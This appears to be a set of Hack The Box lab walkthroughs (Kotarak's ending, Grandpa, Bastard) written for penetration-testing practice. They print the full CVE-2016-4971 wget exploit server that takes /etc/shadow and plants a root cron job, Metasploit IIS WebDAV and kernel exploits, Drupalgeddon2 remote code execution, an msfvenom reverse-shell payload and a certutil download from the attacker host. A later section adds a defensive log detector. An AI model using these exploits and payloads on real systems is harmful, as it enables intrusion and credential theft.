root@kali:~#
After that, install pyftpdlib and launch the FTP server with the following command.
root@kali:~# pip install pyftpdlib
---
root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-14 18:13:11] >>> starting FTP server on 0.0.0.0:21, pid=111918 <<<
[I 2020-01-14 18:13:11] concurrency model: async
[I 2020-01-14 18:13:11] masquerade (NAT) address: None
[I 2020-01-14 18:13:11] passive ports: None
The advisory also provides the malicious HTTP server side as a Python script, “wget-exploit.py”:
root@kali:~# cat wget-exploit.py
#!/usr/bin/env python
#
# Wget 1.18 < Arbitrary File Upload Exploit
# Dawid Golunski
# dawid(at)legalhackers.com
#
# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt
#
# CVE-2016-4971
#
import SimpleHTTPServer
import SocketServer
import socket


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
    def do_GET(self):
        # This takes care of sending .wgetrc
        print "We have a volunteer requesting " + self.path + " by GET :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :(\n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return
        print "Uploading .wgetrc via ftp redirect vuln. It should land in /root\n"
        self.send_response(301)
        new_path = '%s' % ('ftp://anonymous@%s:%s/.wgetrc' % (FTP_HOST, FTP_PORT))
        print "Sending redirect to %s\n" % (new_path)
        self.send_header('Location', new_path)
        self.end_headers()

    def do_POST(self):
        # In here we will receive extracted file and install a PoC cronjob
        print "We have a volunteer requesting " + self.path + " by POST :)\n"
        if "Wget" not in self.headers.getheader('User-Agent'):
            print "But it's not a Wget :(\n"
            self.send_response(200)
            self.end_headers()
            self.wfile.write("Nothing to see here...")
            return
        content_len = int(self.headers.getheader('content-length', 0))
        post_body = self.rfile.read(content_len)
        print "Received POST from wget, this should be the extracted /etc/shadow file:\n\n---[begin]---\n%s\n---[eof]---\n\n" % (post_body)
        print "Sending back a cronjob script as a thank-you for the file..."
        print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
        self.send_response(200)
        self.send_header('Content-type', 'text/plain')
        self.end_headers()
        self.wfile.write(ROOT_CRON)
        print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)\n"
        return


HTTP_LISTEN_IP = '192.168.57.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.57.1'
FTP_PORT = 21

ROOT_CRON = "* * * * * root /usr/bin/id > /root/hacked-via-wget\n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
    print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
    print "FTP is down :( Exiting."
    exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT
handler.serve_forever()
The script as published is only a template: the listen address and the FTP host must be changed to ours (Kotarak reaches us at 10.10.14.36, and an empty HTTP_LISTEN_IP binds every interface), as in lines 62 to 65 of the edited copy:
root@kali:~# cat -n wget-exploit.py | head -n 65 | tail -n 4
62 HTTP_LISTEN_IP = ''
63 HTTP_LISTEN_PORT = 80
64 FTP_HOST = '10.10.14.36'
65 FTP_PORT = 21
Then, go to a directory that we have write permission on the “Kotarak”.
Upload the python script “wget-exploit.py”.
meterpreter > pwd
/tmp
meterpreter > upload ./wget-exploit.py
[*] uploading  : ./wget-exploit.py -> wget-exploit.py
[*] Uploaded -1.00 B of 2.77 KiB (-0.04%): ./wget-exploit.py -> wget-exploit.py
[*] uploaded   : ./wget-exploit.py -> wget-exploit.py
meterpreter >
Binding a listener to port 80 normally requires root, and we only have atanas.
Kotarak has “authbind” installed, which lets an unprivileged user bind to privileged ports, so we run the script through it.
When the cron job’s wget runs again with the injected .wgetrc in place, it POSTs /root/root.txt to us, and the body of that POST is the root flag:
atanas@kotarak-dmz:/tmp$ authbind --deep python wget-exploit.py
authbind --deep python wget-exploit.py
Ready? Is your FTP server running?
FTP found open on 10.10.14.36:21. Let's go then
Serving wget exploit on port 80...
We have a volunteer requesting /archive.tar.gz by GET :)
Uploading .wgetrc via ftp redirect vuln. It should land in /root
10.0.3.133 - - [14/Jan/2020 12:12:01] "GET /archive.tar.gz HTTP/1.1" 301 -
Sending redirect to ftp://anonymous@10.10.14.36:21/.wgetrc
We have a volunteer requesting /archive.tar.gz by POST :)
Received POST from wget, this should be the extracted /etc/shadow file:
---[begin]---
950d1425795dfd38272c93ccbb63ae2c
---[eof]---
Sending back a cronjob script as a thank-you for the file...
It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)
10.0.3.133 - - [14/Jan/2020 12:14:01] "POST /archive.tar.gz HTTP/1.1" 200 -
File was served. Check on /root/hacked-via-wget on the victim's host in a minute! :)
Output of python local FTP server:
root@kali:~# python -m pyftpdlib -p 21 -w
/usr/local/lib/python2.7/dist-packages/pyftpdlib/authorizers.py:244: RuntimeWarning: write permissions assigned to anonymous user.
  RuntimeWarning)
[I 2020-01-14 19:06:59] >>> starting FTP server on 0.0.0.0:21, pid=115096 <<<
[I 2020-01-14 19:06:59] concurrency model: async
[I 2020-01-14 19:06:59] masquerade (NAT) address: None
[I 2020-01-14 19:06:59] passive ports: None
[I 2020-01-14 19:07:11] 10.10.10.55:54274-[] FTP session opened (connect)
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[] FTP session opened (connect)
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] USER 'anonymous' logged in.
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] RETR /root/.wgetrc completed=1 bytes=73 seconds=0.002
[I 2020-01-14 19:08:35] 10.10.10.55:50788-[anonymous] FTP session closed (disconnect).
12 Jan 2020
Retired date: 2017/07/07
Explanation
Hack The Box is a website that hosts a collection of vulnerable machines inside its own VPN.
As practice, I am working through the remaining machines on the list of OSCP-like boxes; this is a walkthrough of “Granpa”, and the same technique works for “Granny”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.14 -sV -sC
Starting Nmap 7.80 (https://nmap.org) at 2020-01-11 15:15 EET
Nmap scan report for 10.10.10.14
Host is up (0.044s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| WebDAV type : Unknown
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Sat, 11 Jan 2020 13:21:06 GMT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 113.63 seconds
root@kali:~#
2. Getting User
Nmap found a single service: Microsoft IIS 6.0 with WebDAV enabled, and write methods such as PUT, MOVE and MKCOL listed as allowed.
Searching for “webdav iis 6 exploit” points at “Microsoft IIS 6.0 - WebDAV ‘ScStoragePathFromUrl’ Remote Buffer Overflow” (CVE-2017-7269).
searchsploit finds the same exploit locally:
root@kali:~# searchsploit iis 6 webdav
------------------------------------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
                                                                                           | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft IIS - WebDAV Write Access Code Execution (Metasploit)                            | exploits/windows/remote/16471.rb
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (1  | exploits/windows/remote/22365.pl
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (2  | exploits/windows/remote/22366.c
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (3  | exploits/windows/remote/22367.txt
Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overflow (4  | exploits/windows/remote/22368.txt
Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit)               | exploits/windows/remote/16470.rb
Microsoft IIS 5.0 - WebDAV Denial of Service                                               | exploits/windows/dos/20664.pl
Microsoft IIS 5.0 - WebDAV PROPFIND / SEARCH Method Denial of Service                      | exploits/windows/dos/22670.c
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure                             | exploits/windows/remote/26230.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                   | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                              | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                            | exploits/windows/remote/8754.patch
------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
root@kali:~#
Metasploit has a module for this vulnerability.
Running it gives a shell as “nt authority\network service”, which is not yet enough to read “user.txt”:
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.36:4444 -> 10.10.10.14:1031) at 2020-01-11 15:49:29 +0200
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2112 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\Documents and settings>whoami
whoami
nt authority\network service
c:\Documents and settings>
3. Getting Root
The process we landed in is a restricted one: the stage runs inside a rundll32.exe spawned by the IIS worker w3wp.exe as “nt authority\network service”, and even meterpreter’s getuid fails:
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
meterpreter >
Before going for SYSTEM, we migrate into a less restricted process that runs as the same user; here that is “notepad.exe” (PID 2872):
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [ System Process]
4 0 System
272 4 smss.exe
324 272 csrss.exe
348 272 winlogon.exe
396 348 services.exe
400 616 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
408 348 lsass.exe
616 396 svchost.exe
684 396 svchost.exe
740 396 svchost.exe
768 396 svchost.exe
804 396 svchost.exe
940 396 spoolsv.exe
968 396 msdtc.exe
1080 396 cisvc.exe
1124 396 svchost.exe
1132 1080 cidaemon.exe
1184 396 inetinfo.exe
1220 396 svchost.exe
1332 396 VGAuthService.exe
1412 396 vmtoolsd.exe
1460 396 svchost.exe
1600 396 svchost.exe
1708 396 alg.exe
1816 616 wmiprvse.exe x86 0 \Device\HarddiskVolume1\WINDOWS\system32\wbem\wmiprvse.exe
1920 396 dllhost.exe
2180 1460 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
2248 616 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
2328 1080 cidaemon.exe
2356 1080 cidaemon.exe
2492 616 wmiprvse.exe
2872 1816 notepad.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\notepad.exe
2972 348 logon.scr
3560 1460 w3wp.exe
3744 2180 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 2872
[*] Migrating from 3744 to 2872...
[*] Migration completed successfully.
meterpreter >
To find out a vulnerability, we can use the Metasploit module “local_exploit_suggester”.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) >
Of the suggested exploits, the MS14-070 tcpip.sys kernel exploit works here.
Note that it reports “no session was created”: the module elevates the token of the process we are already in rather than spawning a new payload, so after it completes the existing session 1 is SYSTEM.
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.52.0.73:4444
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
root.txt is in the directory “C:\Documents and Settings\Administrator\Desktop”.
meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > cat root.txt
9359e905a2c35f861f6a57cecf28bb7b
meterpreter >
11 Jan 2020
Retired date: 2017/09/17
Explanation
Hack The Box is a website that hosts a collection of vulnerable machines inside its own VPN.
This is a walkthrough of the box “Bastard”.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.9 -sC -sV
Starting Nmap 7.80 (https://nmap.org) at 2020-01-10 17:29 EET
Nmap scan report for 10.10.10.9
Host is up (0.044s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 ( http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries ( 15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done : 1 IP address ( 1 host up) scanned in 169.57 seconds
root@kali:~#
2. Getting User
Browsing to port 80 shows a site running the Drupal CMS.
The quickest way to learn its version is the CHANGELOG.txt that Drupal 7 ships in the web root (robots.txt above even lists it); its first line states the version.
The version is Drupal 7.54.
root@kali:~# curl -s http://10.10.10.9/CHANGELOG.txt | head
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines ( API addition:
https://www.drupal.org/node/2826480) .
- Logging of searches can now be disabled ( new option in the administrative
interface) .
- Added menu tree render structure to ( pre-) process hooks for theme_menu_tree()
( API addition: https://www.drupal.org/node/2827134) .
- Added new function for determining whether an HTTPS request is being served
root@kali:~#
With the version known, check the public exploits for Drupal 7.
root@kali:~# searchsploit drupal 7
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| ( /usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( Add Admin User) | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( Admin Session) | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( PoC) ( Reset Password) ( 1) | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( PoC) ( Reset Password) ( 2) | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection ( Remote Code Execution) | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' ( Authenticated) Remote Code ( Metasploit) | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' ( Authenticated) Remote Code Execution ( PoC) | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG ( Drupal 6.x/7.x) - Persistent Cross-Site Scripting | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution ( Metasploit) | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | exploits/php/webapps/44501.txt
------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~#
Drupal 7.54 falls inside the “< 7.58” range of Drupalgeddon2, CVE-2018-7600, an unauthenticated remote code execution bug in Drupal’s Form API render arrays. Besides the Metasploit module listed above (44449.rb), a standalone Python PoC for Drupal 7, drupa7-CVE-2018-7600.py by pimps, can be found on GitHub by searching for its name; it is used from the directory ~/CVE-2018-7600 below.
The script needs two Python packages first.
root@kali:~# pip install requests
---
root@kali:~# pip install bs4
---
Run the script with the command to execute (-c) and the target URL.
The command output comes back in the HTTP response: we have RCE, and it runs as the IIS application-pool identity nt authority\iusr.
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "whoami" http://10.10.10.9
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION ( CVE-2018-7600) |
| by pimps |
=============================================================================
[ * ] Poisoning a form and including it in cache.
[ * ] Poisoned form ID: form-zOmyPneEf5iyoz3yKt8zu5m59kxdtrcNPWZ1eaYNM7s
[ * ] Triggering exploit to execute: whoami
nt authority\iusr
root@kali:~/CVE-2018-7600#
Next, to obtain a reverse shell, generate a payload with msfvenom.
root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=1338 -f exe > shell.exe
[ -] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[ -] No arch selected, selecting arch : x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
root@kali:~#
To get shell.exe onto the target, serve it over HTTP from the attacking machine (port 8000 by default):
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
Then make the target fetch it through the RCE. certutil.exe is present on every Windows install and downloads files with “-urlcache -split -f”; the file is written relative to the working directory of the PHP process (the Drupal web root), which is why the bare name shell.exe works in the next step.
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe" http://10.10.10.9
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION ( CVE-2018-7600) |
| by pimps |
=============================================================================
[ * ] Poisoning a form and including it in cache.
[ * ] Poisoned form ID: form-eluco1rRs3Likgl6whfexWXJUfBv18WMnuEcvVUc-hw
[ * ] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.36:8000/shell.exe shell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
root@kali:~/CVE-2018-7600#
Before triggering it, start a handler for the meterpreter payload; the payload type, LHOST and LPORT must match the values given to msfvenom.
msf5 > use exploit/multi/handler
msf5 exploit( multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit( multi/handler) > set lhost 10.10.14.36
lhost => 10.10.14.36
msf5 exploit( multi/handler) > set lport 1338
lport => 1338
msf5 exploit( multi/handler) > run
Finally, use the RCE once more to execute the uploaded shell.exe on the target.
root@kali:~/CVE-2018-7600# python drupa7-CVE-2018-7600.py -c "shell.exe" http://10.10.10.9
()
=============================================================================
| DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION ( CVE-2018-7600) |
| by pimps |
=============================================================================
[ * ] Poisoning a form and including it in cache.
[ * ] Poisoned form ID: form-3CDbNQWCSlC7U8JT4zNX52Lhbp3Kyc3txDmOtm_2Cxk
[ * ] Triggering exploit to execute: shell.exe
The handler receives the connection and we get a meterpreter session as NT AUTHORITY\IUSR.
msf5 exploit( multi/handler) > run
[ * ] Started reverse TCP handler on 10.10.14.36:1338
[ * ] Sending stage ( 206403 bytes) to 10.10.10.9
[ * ] Meterpreter session 1 opened ( 10.10.14.36:1338 -> 10.10.10.9:49242) at 2020-01-11 00:39:37 +0200
meterpreter > getuid
Server username: NT AUTHORITY\IUSR
meterpreter >
“user.txt” is in the directory “C:\Users\dimitris\Desktop”.
meterpreter > pwd
C:\users\dimitris\desktop
meterpreter > cat ./user.txt
ba22fde1932d06eb76a163d312f921a2
meterpreter >
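Seen from the defender’s side, every command sent through the PoC above leaves two requests in the IIS log: the first carries Drupal render-array keys such as name[#post_render][] in the query string, the second calls the file/ajax callback with a #value element and the poisoned form_build_id. The following detector is an added example, not part of the original walkthrough; the log excerpt is constructed (IIS 7.5 W3C format with the default field set, percent-encoding as a Python requests client would send it), and the indicator names and the list of download cradles are my own choices.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS 7.5 W3C log excerpt (not real data from the box): the two
# requests the PoC sends per command (stage 1 poisons the form cache through
# render-array keys in the query string, stage 2 triggers the file/ajax
# callback), once for "whoami" and once for the certutil download, followed
# by ordinary traffic.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Date: 2020-01-10 22:39:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-01-10 22:39:01 10.10.10.9 POST / q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=whoami 80 - 10.10.14.36 python-requests/2.22.0 200 0 0 125
2020-01-10 22:39:01 10.10.10.9 POST / q=file/ajax/name/%23value/form-zOmyPneEf5iyoz3yKt8zu5m59kxdtrcNPWZ1eaYNM7s 80 - 10.10.14.36 python-requests/2.22.0 200 0 0 93
2020-01-10 22:41:10 10.10.10.9 POST / q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=certutil.exe+-urlcache+-split+-f+http%3A%2F%2F10.10.14.36%3A8000%2Fshell.exe+shell.exe 80 - 10.10.14.36 python-requests/2.22.0 200 0 0 140
2020-01-10 22:41:11 10.10.10.9 POST / q=file/ajax/name/%23value/form-eluco1rRs3Likgl6whfexWXJUfBv18WMnuEcvVUc-hw 80 - 10.10.14.36 python-requests/2.22.0 200 0 0 2031
2020-01-10 22:41:30 10.10.10.9 GET / - 80 - 10.10.14.36 Mozilla/5.0 200 0 0 15
2020-01-10 22:41:35 10.10.10.9 GET /CHANGELOG.txt - 80 - 10.10.14.36 curl/7.67.0 200 0 0 4
2020-01-10 22:42:00 10.10.10.9 GET / q=node/1 80 - 10.10.14.36 Mozilla/5.0 200 0 0 12
"""

RENDER_KEY = re.compile(r"\[#\w+\]")                # a render-array key, e.g. name[#post_render]
AJAX_TRIGGER = re.compile(r"^file/ajax/.+/#value/")  # stage-2 callback path
CRADLES = ("certutil", "powershell", "bitsadmin", "cmd.exe")


def parse_iis_w3c(text):
    """Yield one dict per request line, naming columns from the last #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split(" ")
            if len(parts) == len(fields):        # skip truncated or malformed lines
                yield dict(zip(fields, parts))


def indicators(record):
    """Return [(indicator, detail), ...] for one parsed log record."""
    query = record.get("cs-uri-query", "-")
    if query == "-":
        return []
    found = []
    # parse_qsl percent-decodes keys and values, so %5B%23 becomes "[#".
    for key, value in parse_qsl(query, keep_blank_values=True):
        if RENDER_KEY.search(key):
            found.append(("drupal-render-array-key", f"{key}={value}"))
            if key.endswith("[#markup]") and any(c in value.lower() for c in CRADLES):
                found.append(("download-cradle", value))
        elif key == "q" and AJAX_TRIGGER.match(value):
            found.append(("drupalgeddon2-ajax-trigger", value))
    return found


def scan_log(text):
    """Run the indicators over a whole log; one finding per (record, indicator)."""
    hits = []
    for rec in parse_iis_w3c(text):
        for name, detail in indicators(rec):
            hits.append({"time": f"{rec['date']} {rec['time']}", "src": rec.get("c-ip"),
                         "method": rec.get("cs-method"), "indicator": name, "detail": detail})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["time"], h["src"], h["indicator"], h["detail"][:80])
```

Note that the render-array keys are only visible because this PoC sends them as query parameters; a variant that puts them in the POST body leaves nothing in the IIS log, so the file/ajax trigger and the certutil process creation (Sysmon event 1 or 4688 with command line) are the more robust signals.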
3. Getting Root
Running systeminfo shows Windows Server 2008 R2 build 7600 (no service pack) with “Hotfix(s): N/A”, i.e. an install that never received an update.
That makes a kernel exploit the natural route to SYSTEM.
C:\Users\Administrator\Desktop>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46
System Boot Time: 11/1/2020, 1:15:17
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor( s) : 2 Processor( s) Installed.
[ 01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[ 02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el; Greek
Input Locale: en-us; English ( United States)
Time Zone: ( UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.565 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.578 MB
Virtual Memory: In Use: 517 MB
Page File Location( s) : C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix( s) : N/A
Network Card( s) : 1 NIC( s) Installed.
[ 01]: Intel( R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address( es)
[ 01]: 10.10.10.9
C:\Users\Administrator\Desktop>
This time, MS15-051 (win32k.sys ClientCopyImage, exploit/windows/local/ms15_051_client_copy_image) is used to get a SYSTEM shell. Target 1 is the x64 variant, which must match the architecture of the meterpreter session (the payload was generated as windows/x64).
msf5 exploit( multi/handler) > use exploit/windows/local/ms15_051_client_copy_image
msf5 exploit( windows/local/ms15_051_client_copy_image) > set session 1
session => 1
